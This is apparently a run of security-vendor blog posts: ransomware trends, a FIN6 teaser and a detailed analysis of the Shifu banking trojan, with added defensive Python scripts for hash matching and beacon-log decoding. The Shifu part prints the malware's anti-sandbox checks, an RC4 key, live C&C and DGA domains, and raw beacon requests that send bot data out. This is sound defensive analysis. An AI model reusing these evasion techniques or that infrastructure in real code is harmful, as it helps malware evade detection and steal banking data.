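The practical lesson for the sandbox or the analyst is in stage2_unpack: the binary never checks its argument, so a detonation without "123" does not fail cleanly, it decodes garbage and crashes. When reproducing this sample, run it with the same argument the first stage supplies, and treat a "crashes on launch" verdict from an automated sandbox as inconclusive rather than benign.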
Conclusion
As of today, the Locky spam campaign is still ongoing, with an added
anti-analysis / sandbox evasion technique. We expect to see additional
Locky spam campaigns and will remain vigilant in order to protect our customers.
Email Hashes
UPDATE (June 15, 2016): This post has been updated to include new
data on ransomware activity, which is also now broken down by region.
Cyber extortion for financial gain is typically carried out in one
of two ways. The first method is a business disruption attack, a
category we discussed at length in . In this type of attack, threat actors target an
organization's critical business systems, capture confidential data
and threaten to do something malicious with that data (such as expose,
delete, or encrypt it) unless a ransom is paid. This method is
generally more targeted, requires a greater deal of finesse on the
part of the threat actors, and often has a greater potential payout.
Ransomware is the other common method of cyber extortion for
financial gain.
Ransomware is a type of malware that prevents users from interacting with their
files, applications or systems until a ransom is paid, typically in
the form of an anonymous currency such as Bitcoin. While individual
computer and mobile device users have long been targets of ransomware,
the threat has expanded. Ransomware has gained publicity in recent
months through mainstream media coverage of ransomware attacks against
organizations, namely hospitals.
While the end goal is the same (some type of financial payout to
the attacker), not all ransomware operates the same way. The
file-encrypting variety is perhaps the most dangerous. This is because
the targeted files, which often contain users' or organizations' most
valuable data, become useless without the decryption key. The issue is
compounded because paying the ransom offers no guarantee that the
files will be unlocked, thus making frequent backups the best defense
against ransomware.
Since the average ransom demanded from an individual user is
relatively low (typically a few hundred dollars, if that), threat
actors distributing ransomware typically follow the "spray and pray"
tactic of sending out as many lures as possible, such as emails with
malicious attachments or links to malicious websites, to
maximize their potential gains.
Ransomware Spike in March
Based on data from FireEye Dynamic Threat Intelligence, ransomware
activity has been rising fairly steadily since mid-2015. We observed a
noticeable spike in March 2016. Figure 1 depicts the percentage of
ransomware compared to all malware detected on FireEye products from
October 2015 to May 2016.
Figure 1: Ransomware detections from August 2015 to May 2016
The spike is noteworthy, and consistent with other observations. In
March 2016, FireEye Labs detected a significant
downloaders due to an email spam campaign
targeting users in more than 50 countries. The malicious email
attachments pretended to contain an invoice or a picture, but opening
the attachment led to an infection instead.
Ransomware in the Media
There is no denying the satisfaction an attacker feels when their
exploits make the news. For threat actors distributing ransomware, the
satisfaction is even greater when the headlines report that the victim
paid the ransom. A recent blitz of ransomware reports in the media,
as well as the follow-up success stories, may have spurred other
attackers to get in on the action, possibly resulting in the March
ransomware activity spike. The Petya ransomware, for instance,
includes links to recent media articles on its ransom payment page, as
shown in Figure 2.
Figure 2: FireEye Threat Intelligence in 2016
uncovered Petya ransomware advertising links to recent media
articles on their ransomware payment page
Hollywood Presbyterian Medical Center incident
In early February, Hollywood Presbyterian Medical Center (HPMC) was
in the media spotlight after their systems . Midway through the
month, Allen Stefanek, president and CEO,
that staff had trouble accessing the network beginning Feb. 5. He
explained that malware locked access to certain computer systems and
prevented the sharing of communications electronically, and indicated
that a ransom of 40 Bitcoins had been requested (approximately $17,000
at the time).
"The quickest and most efficient way to restore our systems and
administrative functions was to pay the ransom and obtain the
decryption key," Stefanek wrote. "In the best interest of restoring
normal operations, we did this." HPMC restored its electronic medical
record system and cleared all systems of the malware by Feb. 15.
Continued targeting of hospitals
Attackers may have taken a hint that hospitals are a lucrative
target. Later in February,
that file-encrypting ransomware infected the
systems of Lukas Hospital and Klinikum Arnsberg hospital, both in
Germany. Then in March,
that data at Union Memorial Hospital in
Maryland, as well as other MedStar hospitals in the Washington, DC
area, were encrypted by ransomware, and that the requested ransom was
45 Bitcoins, or about $18,500 at the time.
The targeting of hospitals is no surprise. Cyber criminals have been
increasingly turning to industries such as healthcare that possess
critical data but may have limited investment in security across their
enterprise. With hospitals, budget dollars often go towards surgery
wards, emergency care centers and supplies for a large number of
patients, not security. This makes for a tricky issue, since
hospitals cannot operate without the necessary patient data stored in
their systems.
Other Factors Influencing Uptick in Ransomware Activity
High-profile media coverage of ransomware is certainly attracting
attackers, but that is not the only factor driving the uptick in
activity. The following are some additional factors contributing to
the increase:
Relatively high profit margins coupled with the relatively low
overhead required to operate a ransomware campaign have bolstered
the appeal of this particular attack type, fueling market demand for
tools and services corresponding to its propagation. For example, we
observed a small-scale ransomware operation that nevertheless likely
netted the perpetrators about $75,000.
The success of prolific ransomware families such as CryptoWall
has provided a blueprint for aspiring ransomware developers,
showcasing increasing profit margins and campaign sustainability.
According to the Internet Crime Complaint Center (IC3), CryptoWall
generated identified victim losses totaling more than $18 million
between April 2014 and June 2015.
The emergence of several new ransomware variants
adopting a Ransomware as a Service (RaaS) framework since mid-2015,
a phenomenon likely driven by the competitive development of quality
goods and services within the cyber crime ecosystem. Based on
multiple factors, RaaS offerings, which are uniquely poised to
capitalize on current underground marketplace demand for ransomware,
are highly likely to fuel an increasing number of ransomware
infections.
Ransomware Variants
Through this discernible uptick in ransomware activity from mid-2015
to early 2016, FireEye has observed significant growth and maturation
of the ransomware threat landscape, predominately involving the
proliferation of myriad new variants.
Prolific Ransomware Families
We continue to observe the sustained distribution of multiple,
well-established ransomware families used in both geographically
targeted and mass infection campaigns. In multiple cases these
renowned variants, such as CryptoWall and TorrentLocker, spawned
updated variants with improvements in either encryption capabilities
or obfuscation techniques. These established ransomware brands will
continue to pose a significant threat to global enterprises, as
malware functionality, encryption techniques and counter-mitigation
measures are adapted and successfully introduced into updated
variants. Examples include:
TorrentLocker: Throughout 2015, FireEye observed continued
distribution of TorrentLocker, a ransomware family based on both
CryptoLocker and CryptoWall. According to multiple open-source
reports, TorrentLocker has been active since at least early 2014 and
is most often distributed in geographically-specific spam
campaigns.
CTB-Locker: CTB-Locker, a name that represents the key
elements of the ransomware, namely Curve (for Elliptic Curve
Cryptography), Tor and Bitcoin, was first seen around mid-2014 and
remained active throughout 2015. During this reporting period, we
observed multiple campaigns propagating CTB-Locker and its variants,
including CTB-Locker distributors capitalizing on Windows 10
releases and free upgrades by .
Novel Ransomware Variants
We have also observed several new ransomware variants that
incorporate a range of new tactics, techniques and procedures (of
varying degrees of technical practicality). Based on the increased
growth in this area, we expect ransomware developers to continue
equipping ransomware variants with novel features in order to expand
targeted platforms and increase conversion ratios.
Chimera: The operators behind the "Chimera" ransomware not
only used the malware to encrypt victims' files, but further
threatened to publish the encrypted data if victims failed to pay
the ransom. The threat actors began targeting German-based small and
medium-sized business enterprises around mid-September 2015.
Ransom32: Ransom32, first publicly reported in late December
2015, is purportedly one of the first ransomware variants based
entirely on JavaScript, potentially allowing for cross-operating
system (OS) compatibility and packaging for both Linux and Mac
LowLevel04: According to , operators of LowLevel04 purportedly spread the
ransomware using the unconventional infection mechanism of
exploiting Remote Desktop and Terminal Services.
Linux.Encoder.1: According to , Linux.Encoder.1 debuted in late 2015 as one of the
first ransomware variants targeting Linux web-based servers. While
the encryption capabilities of the earliest variants proved to be
suspect, with multiple reports alleging faults in its predictable
encryption key, the targeting associated with this malware family
represents a deviation from more traditional Windows-based
Outlook and Implications
We expected to see the ransomware threat landscape sustain, if not
exceed, levels observed in 2015, and so far we have been right. Cyber
extortion has gained significant notoriety, with illicit profits
garnered from highly publicized campaigns undoubtedly resonating among
cyber criminals. Recent campaigns in which targeted victims paid the
ransom demand reinforce the legitimacy and popularity of this
particular attack method.
One of the most worrying threats concerns the targeted deployment of
ransomware after the attackers have already gained a foothold in the
network. In these cases, threat actors may be able to conduct
reconnaissance to strategically disable or delete backups and identify
those systems most critical to an organization's operations before
deploying the ransomware. To increase the difficulty of such an
attack, enterprises are encouraged to properly segment networks and
implement access controls. In addition, enterprises should evaluate
backup strategies regularly and test those backups to ensure that
recovery is successful. Finally, copies of backups should be stored
offsite in case onsite backups are targeted.
Learn more about ransomware during our webinar on May 19, 2016, at
11:00am EDT.
Cybercrime operations can be intricate and elaborate, with careful
planning needed to navigate the various obstacles separating an
attacker from a payout. Yet reports on these operations are often
fragmentary, as the full scope of attacker activity typically occurs
beyond the view of any one group of investigators.
FireEye Threat Intelligence and iSIGHT Partners recently combined
our research to provide a unique and extensive look into the
activities of one particular threat group: FIN6.
FIN6 is a cyber criminal group that steals payment card data for
monetization from targets predominately in the hospitality and retail
sectors. The group was observed aggressively targeting and
compromising point-of-sale (POS) systems and making off with millions
of payment card numbers. These card numbers were later sold on a
particular underground "card shop," potentially earning FIN6 hundreds
of millions of dollars.
This report provides wide-ranging, end-to-end visibility into FIN6's
cybercrime operations, detailing initial intrusion, methods used to
navigate the victim network, other tactics, techniques, and procedures
(TTPs), and the sale of stolen payment card data in an underground marketplace.
Please join us for a webinar on Thursday, May 5 at 11:00am ET/8:00am
The video below offers an overview of the methods FIN6 uses.
A Look at Shifu – Behavior, Capabilities and
Communications…
As part of our
normal course of operations as a cyber threat intelligence provider,
we monitor the
underground and provide analysis
to our clients on new and emerging threats. As you can imagine, we
naturally run into large quantities of malware on a daily basis.
From time to time, we release findings to the public in the interest
of informing the community around new threats and providing
actionable analysis to support the hunt and kill missions. Below is
a write up on the Shifu trojan – we hope that you find this useful
and that it helps you better protect your organization from this
Should you have any questions
about the details in this blog, please do not hesitate to
and we will work to get you the answers that you
Key Points:
Shifu is a novel malware family built
using tactics, techniques and procedures (TTPs) from multiple
malware families including Shiz, Zeus and possibly Dridex.
Noteworthy to Shifu is a custom
application program interface (API) that is used to control the
various aspects of the malware and to report the results of the
API execution back to the attacker.
Httpd, an Apache HTTP server, is
installed and used by Shifu to communicate with the attacker’s
command and control (C&C) server.
Known Targeted Entities…
At current, targeting seems to focus
largely on the UK and Japan. However, this does not mean that other
geographies are not at risk from Shifu and its controllers.
The following is a list of targeted UK
entities (we are continuing our attempts to retrieve a list of
targeted entities for Japan):
Adam & Company
Allied Irish Bank (IBusiness
Bank of Scotland
Clydesdale & Yorkshire Bank
Coutts & Co.
Danske Bank
Lloyds Bank
NatWest Online Banking
Royal Bank of Scotland Digital
Triodos Bank
Ulster Bank
Unity Trust Bank
Yorkshire Building Society
Analysis of Representative Malware
iSIGHT Partners analyzed
numerous samples of the Shifu malware. This malware recently donned
the name Shifu, but earlier variants of the malware were referred to
as “PowerAgent.” The deviation in the name is due to the
Windows Registry key that the malware creates,
“IntelPowerAgent6.”
The malware shares many similarities with other known banking Trojans
such as Zeus, Dridex and Shiz. Like many malware families created
after the emergence of Zeus, there is a blending of tactics,
techniques and procedures (TTPs) for multiple malware families. Each
of these similarities will be examined in detail.
The malware uses several methods to evade
analysis and frustrate researchers. When first launched, the malware
uses a loader to drop, install and patch the core payload prior to
execution. If the payload is run as a standalone application, it
will appear corrupted since the loader patches several payload parts
during installation. It also has the capability to blacklist
applications such as other bots, anti-virus (AV) applications and
research tools. The malware uses cyclic redundancy check (CRC)
hashes for any application that is blacklisted or whitelisted, as we
will cover later.
In addition to
the noted blacklist, the loader has a separate application blacklist
check that will immediately end execution of the malware if a listed
application is detected. Additionally, the loader will check a CRC
hash of itself and, if found, will bypass any virtual machine (VM)
detection routines. This check is possibly used for testing
purposes, and the hash is based on the name of a development copy to
prevent the malware from terminating as a result of running in a VM.
The loader will also check to see if a SmartCard reader is attached
to the infected machine and, if detected, will bypass any other VM
detections routines. This is probably because the presence of a
SmartCard reader signifies a physical machine rather than a VM.
Shifu also uses several more CRC hash
lists to determine which branching function to use. The following
are some of the lists or hashes the malware checks:
List of web browsers that will hook
Winsock APIs if found to monitor network traffic
Specific domains and/or hashes that
initiate C&C communications
Name/hash for httpd (standalone Apache
HTTP server)
Point-of-sale
(POS) process names and hashes for likely related
applications
Bitcoin wallets
Although Shifu contains certain CRC
hashes for identifying security products and analysis tools, it also
contains a list of AV vendors to check. The malware will not
terminate after identifying one of the following and will only check
prior to posting any data to the attacker’s command and control
(C&C) server:
AVAST Avast
Data Fellows – F-Secure
Panda Software
Doctor Web
Eset – Nod
Softed – ViGUARD
Bitdefender
ComodoGroup
KasperskyLab – protected
Microsoft Antimalware
TrendMicro
Network Associates- TVD
Zone Labs – ZoneAlarm
Two components
effectively make up the initial Shifu binary: a loader and a DLL
(main payload). The loader is responsible for performing all of the
anti-VM, anti-analysis and anti-sandbox checks. If all of the checks
pass, the loader will decompress, patch and inject the core DLL into
the shell process. Querying the following Windows registry key
identifies the shell process:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon, value “Shell”
After querying the registry key, the
loader attempts to inject the patched DLL in the shell process.
Significantly, the DLL itself is in a corrupted state after
decompression and requires the loader to patch it before injection
into the shell process. The patching process is as follows:
Patch MZ, PE header
Patch entry point relative virtual
address (RVA)
Patch import
Decode imports
Obfuscate all imported APIs
Static Analysis
Shifu is heavily obfuscated, and initial
examination of the payload revealed little of interest aside from a
possible custom packer used by the malware called
“divederail” with a compile time of Aug. 6, 2015.
After successfully patching and examining the core DLL, the
following project folder and debug string was revealed:
Z:\coding\project\main\payload\payload.x86.pdb
During our analysis, we uncovered
many different modules that the malware uses, including the
following:
payload.cpp
src\fuckup.cpp
src\system.cpp
src\ipc.cpp
src\killos.cpp
src\bot.cpp
src\keylog.cpp
src\seh.cpp
src\certs.cpp
src\knock.cpp
src\debugmsg.cpp
src\cmdinject.cpp
src\logsend.cpp
src\str.cpp
src\cmdload.cpp
src\mitm.cpp
src\fileio.cpp
src\cmdmitm.cpp
src\msghook.cpp
src\memory.cpp
src\cmdupdate.cpp
src\proclist.cpp
src\hashes.cpp
src\commands.cpp
src\rootkit.cpp
src\jpeg.cpp
src\config.cpp
src\sniffer.cpp
src\inet.cpp
src\dga.cpp
src\systems.cpp
src\dgalib.cpp
src\sysinfo.cpp
src\virtkeys.cpp
src\osver.cpp
src\dllinject.cpp
src\vnc.cpp
The core payload has a plethora of
capabilities and possible modules it can download for added
functionality. The malware re-uses some functionality from Zeus,
Dridex and Shiz. This data is highlighted below:
Zeus Functions:
tellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jack
henry|cruisenet|gplusmain|silverlake|v48d0250s1
(Same process checks seen from Zeus. If
Shifu detects any of these strings, it will take a screenshot, post
key log data and send system information to the attacker’s C&C server.)
Additionally, some of
the anti-analysis and anti-VM techniques are consistent with
previous Zeus variants.
Shiz Functions:
Shifu uses a modified version of the
Shiz DGA. The variables and methods used in the generation of the
domains have changed.
Dridex Functions:
Although not an explicit function, Shifu
uses an XML configuration file similar to that of the Dridex
malware (aka Bugat).
Shifu is able to accept a range of commands, from updating the bot to
destroying the operating system (OS). The following are the commands
that Shifu supports:
deactive_sk
deactive_bc
wipe_cookies
mitm_script
In addition to being able to use the above
commands, Shifu uses a custom API for controlling the bot and
reporting results of the API execution back to the C&C server.
The following is a table containing these API functions:
FileSaveTo
PayloadRoutine
AvProcessResult
FileToBase64
PrintScreenJpeg
BotEnableAutorunAndProtect
ProcessCommand
BotFixAutorunPolicy
ProcListInjectAll
BotIsResident
GetLastErrorWinInet
ReportOKCmd
BotNameInitialize
RkSetHidden
BotProtectFile
RootkitInit
CertgrabProccessSystemStores
HttpSendRequestExtended
SehInitialize
CertHandlerContinue
SendAccount
CertsFixValidateCA
InetDownloadFile
SnifferInit
CertsSetHooks
InetHostCheckConnection
StartHttpd
CheckFileMD5
InetIsHostOnline
StartKnockRoutine
CheckProcessesFromZeusGOV
InetSendRequestPOST
StrGetTextBetween
CheckResidentStateThread
IpcInitServerThread
StrUnicodeToAscii
CommandDoInject
SysCloseHandle
CommandDoLoad
IpcProcessPipeStr
SysEnableExeAutoRun
CommandDoMitmMod
IpcProcessSendWEbLog
SysExecuteFile
CommandDoMitmScript
IpcProcessSetSocksPort
SysGetModuleHandlePin
CommandDoUpdate
IpcProcessSetVncPort
SysGetNiceCompName
ConfigCheckPlugins
IpcSendSystem
SysGetNiceUserName
ConfigForceRead
IpcSendWebSniffLog
SysGetProcessIntegrityLevel
ConfigInit
KeyLogAddToLog
SysGetUserProfileDir
ConfigLoad
KeyLogGetLastCaption
SysInfoNetstat
ConfigProcessPacked
KeyLogInit
SysInfoNetUser
ConfigSave
KnockDoKnock
sysInfoTaskMgr
ConfigWatch
KnockRoutine
SystInitializeLowSecAttrs
ConnectToNewClient
LogSendData
SysInjectDllToProcessById32
DomainCheckSign
LogSendSystemLogEx
SysIsCompInDomain
DomainCheckThread
LogSendWebLog
SysIsKernelLoaded
DomainDownloadKey
SysIsProcessActiveByCRC32
DomainValidateKeyStr
MemProtect
SysIsTerminalSessionProcess
EntryPoint
MemRealloc
SysIsWow64
ExportCertificates
FileCryptDecryptRC4
MitmWriteConfigPhp
SysLoadLibraryAndCallOrdinal32
FileDelete
MitmWriteListenAddrs
SysStartThread
FileDeleteDir
MsghookInit
SystemsCheckCryptoWallets
FileDeleteSubDir
MyPFXImportCertStore
SystemCheckDirs
FileGetSize
OsGetVersion
SysTerminateProcessByPid
FileGetTemp
PatchChromeCertCheck
TopLevelIExceptionHandler
FileLoadFrom
Patchcrptui
VkIsGoodWindow
FileMakeDir
Patcrsaenhnew
VkMageMicroScrshot
PayloadResidentRoutine
Anti-Analysis, Anti-VM & Anti-Sandbox
Many different types of
malware are designed to detect the presence of a VM, sandbox or if
the malware is being analyzed or debugged. Shifu takes this
detection to an extreme level by including dozens of checks with
branching functionality, from terminating itself to reporting back
to its C&C server. The following sections list the various
checks that Shifu performs, including the CRC32 hashes the malware
will check against running processes. Due to the possibility of
collisions, we are unable to perform reverse CRC32 hash lookups in
an attempt to find the name of the processes targeted:
Terminate Immediately
sbiedll.dll
dbghelp.dll
api_log.dll
dir_watch.dll
pstorec.dll
c:\analysis\sandboxstarter.exe
c:\analysis
c:\insidetm
c:\windows\system32\drivers\vmmouse.sys
c:\windows\system32\drivers\vmhgfs.sys
c:\windows\system32\drivers\vmboxmouse.sys
system32\rstrui.exe
Additional checks the malware makes to
determine branching functionality are summarized in the following table:
Skip VM Check: SmartCard reader found; 5217027 (CRC of malicious payload); running on a 64-bit system
Hook Winsock API (Traffic Monitoring): 84E35F10 | firefox.exe; C3DDC6D5 | iexplore.exe; 9C1D0D0E | chrome.exe
Restart Internal Apache HTTP Server
Connect to C&C (if a connection is made to the listed domains, the malware will connect to C&C)
Functionality to Take Screenshot, Grab System Information and
Capture Key Log Data to Send to C&C Server
OmikronMCSign
HBPData\hbp.profile
ELBA5\ELBA_data
jack henry
silverlake
v48d0250s1
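Added example, not from the iSIGHT write-up: forward-hashing a host's process list against the CRC32 values quoted above. Reverse lookup is not possible, as the text notes, but a responder can compute the CRC32 of each running process name under several normalisations and see whether any lands in the reported set. The zlib polynomial and the normalisations tried are assumptions; the write-up does not say which variant Shifu uses.

```python
import zlib

# Hashes quoted in the write-up for the Winsock-hook check, with the process
# names the write-up pairs them with. Whether a standard CRC32 of those names
# reproduces them is not stated, so nothing below assumes that it does.
REPORTED_HASHES = {
    0x84E35F10: "firefox.exe",
    0xC3DDC6D5: "iexplore.exe",
    0x9C1D0D0E: "chrome.exe",
}


def crc32_variants(name: str) -> dict:
    """Standard CRC32 (zlib polynomial) of a process name under the
    normalisations a hash-based blacklist is likely to use. Values are
    unsigned so they compare directly with the hex values in the report."""
    forms = {
        "raw": name.encode("utf-8"),
        "lower": name.lower().encode("utf-8"),
        "upper": name.upper().encode("utf-8"),
        "utf16le": name.encode("utf-16-le"),
        "utf16le_lower": name.lower().encode("utf-16-le"),
    }
    return {label: zlib.crc32(data) & 0xFFFFFFFF for label, data in forms.items()}


def find_matches(process_names, hashes):
    """Forward-hash a process list and report which names fall into the
    hash set, and under which normalisation. A hit tells you both that the
    host runs a targeted process and how the malware normalises names."""
    hashes = set(hashes)
    matches = []
    for proc in process_names:
        for variant, value in crc32_variants(proc).items():
            if value in hashes:
                matches.append((proc, variant, value))
                break
    return matches


def check_host(process_names, hashes=None):
    """Names from a process list that would trigger the check (sorted)."""
    hashes = REPORTED_HASHES if hashes is None else hashes
    return sorted({proc for proc, _, _ in find_matches(process_names, hashes)})


if __name__ == "__main__":
    # Constructed process list; a miss here means none of the normalisations
    # tried reproduces the reported values, not that the host is clean.
    for proc in ["firefox.exe", "iexplore.exe", "chrome.exe"]:
        print(proc, {k: f"{v:08X}" for k, v in crc32_variants(proc).items()})
    print(check_host(["Firefox.EXE", "explorer.exe", "chrome.exe"]))
```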
In addition to these searching and
branching functions, Shifu will also search the infected machine for
Bitcoin-related items in an attempt to steal the data and upload the
C&C server. Shifu attempts to find the following files:
bitcoin\wallet.dat
litecoin\wallet.dat
If the Bitcoin files are found, the data
is saved in a new file prior to uploading to the attacker’s C&C.
The following file names will be used for the captured data:
btc_wallet.dat
ltc_wallet.dat
Shifu also contains a list of processes to
monitor on the infected machine. The goal of the monitoring is to
blacklist and corrupt downloaded binary files from running on the
infected system. The malware hooks the URLDownloadToFile API in the
urlmon.dll library to facilitate this capability. The following
snippet illustrates the file rename to “infected.exx,”
processes to monitor and API function to hook:
During installation, the loader for Shifu will query a number
of settings to include the computer name, user name, install date
and system drive volume serial number. The malware will then create
a string with the compiled data. If the “string” of data
contains any sub-strings defined by the malware, it will set a
control flag, which will likely trigger an event from the C&C
server. The following is a list of the “sub-strings”
hardcoded into the binary (Note: several of the sub-strings appear
to be Russian words or parts of words):
6occ: Russian and similar in pronunciation
May refer to the head of a branch of an
organized crime syndicate. However, the translation is
slightly off, as the “c” would be a hard
“k” sound in Russian
RosPil is a non-profit community
project dedicated to combating abuse and is associated with
the political activist Alexey Navalny. “ROS” may
refer to “Rossia” or “Russia”
Russian word meaning “Financial
Department”
Likely abbreviation for
“operation”
Likely abbreviation for derivatives
of “finance”
Possible abbreviation for the
Russian word meaning “Director” in English
“Cashbox” or “Cash
Desk”
Possibly the first syllable in the
Russian word for “accounting”
Shifu is also
designed to search for authentication information (AUTHINFO) on the
infected machine. Specifically, it searches for the following:
AUTHINFO USER
AUTHINFO PASS
In order to capture this information, the
malware will hook the following API functions:
CryptEncrypt
If ports 110 or 31595 are open, the
captured credentials will be saved as e-mail credentials. If the
ports are not open, the credentials will be saved as FTP
credentials.
In addition to grabbing
the AUTHINFO data, the malware will capture any SSL certificates on
the machine. If the cert is captured, the malware will rename it as
_info.pfx (i.e. 1_info.pfx) and then sequentially increase the
number. The following strings show the hard-coded format to save the
file and the API function used to capture the data:
%s%s%u_cert.pfx
%s%s%u_info.txt
CertEnumSystemStore
Behavior on Infected System (Dynamic Analysis)
Upon initial execution,
Shifu behaves similar to many malware families by generating a
randomized name for a local copy of itself in the user’s
%ProgramData% folder. It will then execute a loader in a separate
process that patches the main payload DLL and handles the injection
into the shell process, explorer.exe.
In parallel to the launch, the malware
will create a BAT file with deletion commands for the original
binary. This has become the standard for much of the recent e-crime
malware. Shifu also creates two different registry keys used for
persistence and to survive a reboot. One of the registry entries is
a RUN key to startup on reboot of the infected system.
The malware will also initiate a keylogger
and begin beaconing out to an attacker’s C&C domain. The initial
domain is hardcoded into the malware, but if the connection repeatedly
fails, Shifu will fall back to its DGA, which is a modified adaptation
of the Shiz DGA. Several other files are created on disk as well.
The following list shows the various artifacts created after
launching the malware:
C:\%ProgramData%\d04dj0886b.exe
(Copy of the original binary)
C:\%AppData%\Local\lld7D53.tmp.bat
(Deletion script)
C:\%AppData%\Local\Temp\2d17e659d
(Text file with location of copied binary)
C:\%AppData%\a8ee54f4\sysinfo.txt
(Collected information on running process on the infected
C:\%AppData%\a8ee54f4 (Key log
Modifications & Persistence Method
HKCU\Software\Microsoft\Windows\2d17e6
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent6
We have also observed different IntelPowerAgent numbers
such as two, three, four or five.
Command and Control
Shifu contains a hard-coded URL for the first initial contact but also has
a DGA that it will fall back on if the main C&C is offline. This
DGA is modeled after Shiz but uses slightly different parameters for
generating the domains. All of the communications that follow a
successful connection use Secure Sockets Layer (SSL). See the
following for one of the more recent SSL certificates, which has
already been blacklisted:
The bot will report key information back to the C&C,
including the result of the various custom API executions. The first
communications include any hard-coded C&C followed by the DGA.
Shifu uses RC4 encryption in the network communications. Notably,
the key for the samples analyzed by iSIGHT Partners is actually the
default RC4 key included with the Crypto library, further suggesting
this malware is under development. The following is the key:
a7zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH
The following are some of the observed hard-coded domains and
DGA domains:
noyokoya-info.chu.jp
eboduftazce-ru.com
adtejoyo1377.tk
fat.uk-fags.top
urkaelt.info (DGA)
nqqxqdg.info (DGA)
fvffynt.info (DGA)
njkyhle.info (DGA)
oaoyorw.info (DGA)
raemscf.info (DGA)
pbchjln.info (DGA)
bgnqado.info (DGA)
The following is an example POST made by
the malware if it is successful in achieving a connection with the
C&C server:
POST https://eboduftazce-ru.com/news/userlogin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www1.google.com
User-Agent: Mozilla/4.0 ( MSIE 2.1; Windows NT 5.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: eboduftazce-ru.com
Content-Length: 92
Cache-Control: no-cache
After the initial POST, the malware will
perform a check-in with the following GET request:
GET /logs/dbg.php?msg=W3NyY1xib3QuY3BwOkJvdElzUmVzaWRlbnQ6MTcxXVsweGViMDsweDdjY10gQm90SXNSZXNpZGVudCByZXR1cm5lZCBGQUxTRQo= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 ( MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.; .NET CLR 3.5.30729)
Host: noyokoya-info.chu.jp
Connection: Keep-Alive
“msg” Data (base64-decoded): [src\bot.cpp:BotIsResident:171][0xeb0;0x7cc]
BotIsResident returned FALSE
Shifu sends many different check-ins back to the C&C server. These
check-ins are based on the execution of the custom API functions.
After the bot uses a function, the execution result is sent back to
the C&C. The following is a list of many of the “msg”
check-ins:
[:BotIsResident:153][0xef8;0xbe0]
MutexName = 2d17e659d346, hMutex = 0x000000ec, GetLastError() =
[:BotNameInitialize:388][0x6e4;0x960]
BotName: ADMINISTRATOR!MIR!FB950325
[:KnockDoKnock:108][0x6e4;0x960]
KnockBuffer:
botid=ADMINISTRATOR!MIR!FB950325&ver=1.537&up=347&os=2300&ime=%2b5&token=0&cn=a3&av=&dmn=
[:HttpSendRequestExtended:116][0x6e4;0x960]
GetLastErrorWinInet: ERROR_INTERNET_CANNOT_CONNECT
[:GetLastErrorWinInet:127][0x6e4;0x960]
[:InetSendRequestPOST:249][0x6e4;0x960]
GetLastErrorWinInet: (null)
[:KnockDoKnock:175][0x6e4;0x960]
KnockDoKnock &=
[:ProcListInjectAll:325][0x6e4;0x968]
First time inject in: HEdit.exe [0x00000b04]
[:BotIsResident:153][0xb04;0x9b0]
MutexName = 2d17e659d346, hMutex = 0x, GetLastError() =
[:ProcListInjectAll:325][0x6e4;0x968]
First time inject in: notepad++.exe [0x0000089c]
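Added example (not part of the iSIGHT write-up) that decodes the check-in GET request above and the “msg” check-ins listed after it from proxy log lines: the base64 msg parameter is decoded and split into source file, function, line, process id, thread id and message text. The log line format is a constructed assumption; the request path, Host and msg value are the ones shown above.

```python
import base64
import re
from urllib.parse import unquote

# Constructed proxy log lines. The request path, the base64 msg value and the
# Host are the ones shown in the write-up; timestamp, client IP and status
# code are invented.
SAMPLE_LOG_LINES = [
    "2015-08-20T10:15:31Z 10.0.0.7 GET http://noyokoya-info.chu.jp/logs/dbg.php"
    "?msg=W3NyY1xib3QuY3BwOkJvdElzUmVzaWRlbnQ6MTcxXVsweGViMDsweDdjY10gQm90SXNSZXNpZGVudCByZXR1cm5lZCBGQUxTRQo= 200",
    "2015-08-20T10:15:32Z 10.0.0.7 GET http://www1.google.com/ 200",
]

# Shape of a decoded check-in, e.g.
#   [src\bot.cpp:BotIsResident:171][0xeb0;0x7cc] BotIsResident returned FALSE
# The file part is empty in several of the check-ins listed in the write-up.
CHECKIN_RE = re.compile(
    r"^\[(?P<file>[^:\]]*):(?P<func>\w+):(?P<line>\d+)\]"
    r"\[(?P<pid>0x[0-9a-fA-F]+);(?P<tid>0x[0-9a-fA-F]+)\]\s*(?P<text>.*)$"
)
MSG_PARAM_RE = re.compile(r"[?&]msg=([^&\s]+)")


def decode_msg(value: str) -> str:
    """URL-decode, then base64-decode, the msg parameter of a dbg.php request."""
    raw = base64.b64decode(unquote(value))
    return raw.decode("ascii", "replace").strip()


def parse_checkin(text: str):
    """Split one decoded check-in into its fields; None if the shape differs."""
    m = CHECKIN_RE.match(text)
    if m is None:
        return None
    return {
        "file": m["file"] or None,
        "function": m["func"],
        "line": int(m["line"]),
        "pid": int(m["pid"], 16),
        "tid": int(m["tid"], 16),
        "text": m["text"].strip(),
    }


def extract_checkins(log_lines):
    """Pull every decodable Shifu check-in out of proxy log lines."""
    found = []
    for line in log_lines:
        if "/logs/dbg.php" not in line:
            continue
        for value in MSG_PARAM_RE.findall(line):
            try:
                parsed = parse_checkin(decode_msg(value))
            except ValueError:          # bad base64 / padding
                continue
            if parsed:
                found.append(parsed)
    return found


if __name__ == "__main__":
    for checkin in extract_checkins(SAMPLE_LOG_LINES):
        print(checkin)
```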
The Shifu Trojan has targeted entities in
the UK and Japan. As noted previously, the malware runs a local
Apache httpd server. This server is used to handle C&C
communications, retrieve configuration data and store the web
injects. The configuration data is stored in a “data”
folder wi
